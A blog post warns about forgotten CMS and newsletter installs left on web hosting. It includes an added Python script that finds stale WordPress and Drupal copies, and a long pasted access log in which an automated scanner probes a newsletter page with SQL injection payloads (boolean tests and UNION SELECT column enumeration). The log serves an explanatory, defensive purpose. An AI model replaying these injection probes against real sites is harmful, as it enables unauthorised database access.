leaving an old CMS hanging around is a really stupid idea

When it comes to data I’m definitely a packrat – and that’s a bad habit when updating websites. Yes, keeping an old newsletter engine around so the archives stay accessible keeps linkrot under control, but at the same time it creates unpatched dungeons that nobody remembers… and that nobody ever updates, of course.

While looking at a hacked WordPress site about a year ago I found, on the same hosting, possibly 5 copies of Drupal – some ancient sub-site for something, a backup copy of that, the previous version, and then some more instances. A survey engine, possibly the remains of a document management system… etc. Once I had deobfuscated the malware, its first lines turned out to start from the root and look for everything worth infecting. Impossible to fix; the only solution is to archive the code (just in case…) and delete it.
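The sweep for forgotten installs that a situation like the one above calls for, as an added example that is not code from the original post: it walks a hosting directory, lists every WordPress and Drupal copy it can recognise together with its version and the age of its last modification, and flags the copies nobody has touched in a year. The marker files and version-string patterns are assumptions about each project's standard layout, not something taken from the post, and the sample tree is constructed in a temporary directory so the script runs offline.

```python
"""Added example (not from the original post): sweep a hosting directory for
every WordPress and Drupal copy, with version and last-modified age, so the
forgotten backups and sub-sites show up in one list.

The marker files and version patterns are assumptions about each project's
standard layout; extend MARKERS for other engines. The sample tree is
constructed in a temp directory so the script runs offline.
"""
import os
import re
import tempfile
import time
from dataclasses import dataclass

# (marker file relative to the install root, CMS name, regex capturing version)
MARKERS = [
    ("wp-includes/version.php", "WordPress",
     re.compile(r"\$wp_version\s*=\s*'([^']+)'")),
    ("includes/bootstrap.inc", "Drupal",            # Drupal 6/7 layout
     re.compile(r"define\('VERSION',\s*'([^']+)'\)")),
    ("core/lib/Drupal.php", "Drupal",               # Drupal 8 and later
     re.compile(r"const VERSION\s*=\s*'([^']+)'")),
]
DAY = 86400


@dataclass
class Install:
    root: str        # path relative to the web root ("." = the main site)
    cms: str
    version: str
    age_days: float  # days since the marker file was last modified


def read_version(path, pattern):
    with open(path, encoding="utf-8", errors="replace") as fh:
        m = pattern.search(fh.read())
    return m.group(1) if m else "unknown"


def find_installs(webroot, now=None):
    """Every directory that contains a marker file counts as one install."""
    now = time.time() if now is None else now
    found = []
    for dirpath, _dirs, _files in os.walk(webroot):
        for rel, cms, pattern in MARKERS:
            marker = os.path.join(dirpath, rel)
            if os.path.isfile(marker):
                age = (now - os.path.getmtime(marker)) / DAY
                root = os.path.relpath(dirpath, webroot).replace(os.sep, "/")
                found.append(Install(root, cms, read_version(marker, pattern), age))
    return sorted(found, key=lambda i: i.root)


def stale(installs, max_age_days=365):
    """Copies nobody has touched in a year are the unpatched dungeons."""
    return [i for i in installs if i.age_days > max_age_days]


FIXED_NOW = 1_700_000_000  # constructed reference time for the sample tree


def build_sample_tree():
    """Constructed sample: a live WordPress site, an old Drupal backup under
    it, and a newsletter directory with no recognised engine."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = [  # (relative path, file content, age in days)
        ("wp-includes/version.php", "<?php\n$wp_version = '4.9.1';\n", 10),
        ("backup/drupal-old/includes/bootstrap.inc",
         "<?php\ndefine('VERSION', '7.26');\n", 800),
        ("newsletter/index.php", "<?php // no version marker\n", 2000),
    ]
    for rel, text, age_days in samples:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
        mtime = FIXED_NOW - age_days * DAY
        os.utime(path, (mtime, mtime))
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    installs = find_installs(root, now=FIXED_NOW)
    for i in installs:
        print(f"{i.root:25} {i.cms:10} {i.version:8} {i.age_days:6.0f} days old")
    print("stale:", [i.root for i in stale(installs)])
```

On a real hosting run it as `find_installs("/var/www")` with no `now`. The age comes from the marker file's mtime, which a restore from backup or a recursive chmod can reset, so treat it as a hint and compare the version it reports against the project's current release; anything the script does not recognise (the newsletter directory in the sample) still has to be walked by hand.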

And it seems I should take some time to go systematically through all my own and my clients’ hostings, as this is not the only site with this problem – and I have left abandoned code around myself. That came back to me while looking for yet another breach and spotting the following lines in the logfile:


176.10.100.229 - - [06/Jun/2014:14:19:54 +0300] "GET /newsletter/index.php?id=41 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:55 +0300] "GET /newsletter/index.php?id=999999.9 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%20or%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:56 +0300] "GET /newsletter/index.php?id=999999.9%27%20or%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:57 +0300] "GET /newsletter/index.php?id=41%20and%201%3E1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:58 +0300] "GET /newsletter/index.php?id=41%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:19:59 +0300] "GET /newsletter/index.php?id=41%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=41%27 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:00 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:01 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:02 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:03 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:04 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:06 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:07 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:08 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:09 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:10 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:11 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:12 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:13 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:14 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:15 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:16 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:17 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:18 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:19 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:20 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:21 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:22 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:23 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:24 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:25 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:26 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
